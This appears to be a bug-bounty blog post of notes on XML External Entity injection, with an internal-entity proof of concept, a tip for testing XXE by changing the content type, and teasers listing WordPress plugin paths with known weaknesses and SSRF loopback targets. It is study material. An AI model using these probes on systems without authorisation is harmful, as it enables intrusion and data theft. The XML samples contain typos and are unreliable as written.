Skip to main content

External Entity Entity Injection [XXE]

External Entity Entity Injection [XXE]



  • Extensible markup language was designed for for desktop publishing & now it is widely being used for data exchange
    • It is a mark up language similar to HTML
    • XML is is typically used  instead of HTML when data must be sent from one application to another (Data Interchange) I.e it acts as middleware [JSON,XML are few examples]



Attackers can exploit how an application parses extensible mark up language by taking advantage of an XXE vulnerability. More specifically it involves exploiting how the application processes the inclusion of external entities in it’s input. Attacker can use XXE to extract information from a server or to call on a malicious server.


Attacker can exploit vulnerable XML process if they can upload XML or include hostile content in an XML document, exploiting vulnerable code, dependencies & integrations, these flaws can be used to extract information , execute a remote request to a malicious server , scan internal systems, perform DOS.


Example :

—————


<?xml version=“1.0” encoding”UTF-8:?>


<Jobs>

<Job>

<Title>Test</Title>

</job>

</Jobs>





Document Type Definition

——————————————


 A valid XML document must follow a set of general XML rules and match a document type definition (DTD). An XML DTD is a set of declarations that define which elements exist, what attributes they can have, and which elements can be enclosed within other elements. (An element consists of the opening and closing tags, so an opening <foo> is a tag and a closing </foo> is also a tag, but <foo></foo> is an element.) XML files can either use an external DTD, or they can use an internal DTD that is defined within the XML document.


We updated the XML to define an external entity using XML Data Type Definition


POC Example :

———————


<?xml version=“1.0” encoding”UTF-8:?>

<!DOCTYPE foo [    // Define XML element called foo

<!ELEMENT foo ANY>   // “ ELEMENT Foo allows any type of content”

<!ENTITY XXE “IT WORKS !!” >]>   //  “ Entity XXE will display it works when it is called “


<Jobs>

<Job>

<Title>&XXE;</Title>

</job>

</Jobs>




SPILLING LOCAL FILES VIA XXE WHEN HTTP OOB FAILS


https://www.noob.ninja/2019/12/spilling-local-files-via-xxe-when-http.html




Change content-type in the request to `application/xml` and verify if the application is processing it. If it is processed then you can go on and test for XXE.

Comments

Post a Comment

Popular posts from this blog

WordPress Common Issue Notes

  WordPress: /wp-content/plugins/sfwd-lms/wpml-config.xml /wp-content/plugins/omni-secure-files/plupload/examples/upload.php /wp-content/plugins/contus-hd-flv-player/uploadVideo.php wp-json/th/v1/user_generation /wp-admin/admin-ajax.php?do_reset_wordpress=1 Wordpress xmlrpc.php -common vulnerabilites & how to exploit them https://medium.com/@the.bilal.rizwan/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32
Post a Comment
Read more

Electron JS Security Checklist

Electron Js Security Checklist Disable nodeIntegration for untrusted origins/Do-not Enable Node-Integration Risk  If enabled, nodeIntegration allows JavaScript to leverage Node.js primitives and modules. This could lead to full remote system compromise if you are rendering untrusted content. Auditing nodeIntegration and nodeIntegrationInWorker are boolean options that can be used to determine whether node integration is enabled.  Auditing For BrowserWindow, default is true. If the option is not present, or is set to true/1, nodeIntegration is enabled as in the following examples:  mainWindow = new BrowserWindow({ "webPreferences": { "nodeIntegration": true, “nodeIntegrationInWorker": 1 } });  Or simply:  mainWindow = new BrowserWindow() For webview tag, default is false.  When this attribute is present, the guest page in webview will have node integration: When sanbox is enabled (see below), nodeintegration is disabled. Please note ...
Post a Comment
Read more

SSRF Notes

SSRF Notes NOTE :   Wanted to have everything at one place,  these are my reference notes from various bug bounty write ups & security  research, I thank all the authors of the write ups mentioned below  [will update if i find anything interesting] Description In an SSRF attack against the server itself, the attacker induces the  application to make an HTTP request back to the server that is hosting  the application, via its loopback network interface. This will typically  involve supplying a URL with a hostname like 127.0.0.1 (a reserved IP address that points to the loopback adapter) or localhost (a commonly used name for the same adapter).           Many server-side request forgery vulnerabilities are relatively easy to  spot, because the application's normal traffic involves request  parameters containing full URLs Blind SSRF Blind SSRF vulnerabilities arise...
Post a Comment
Read more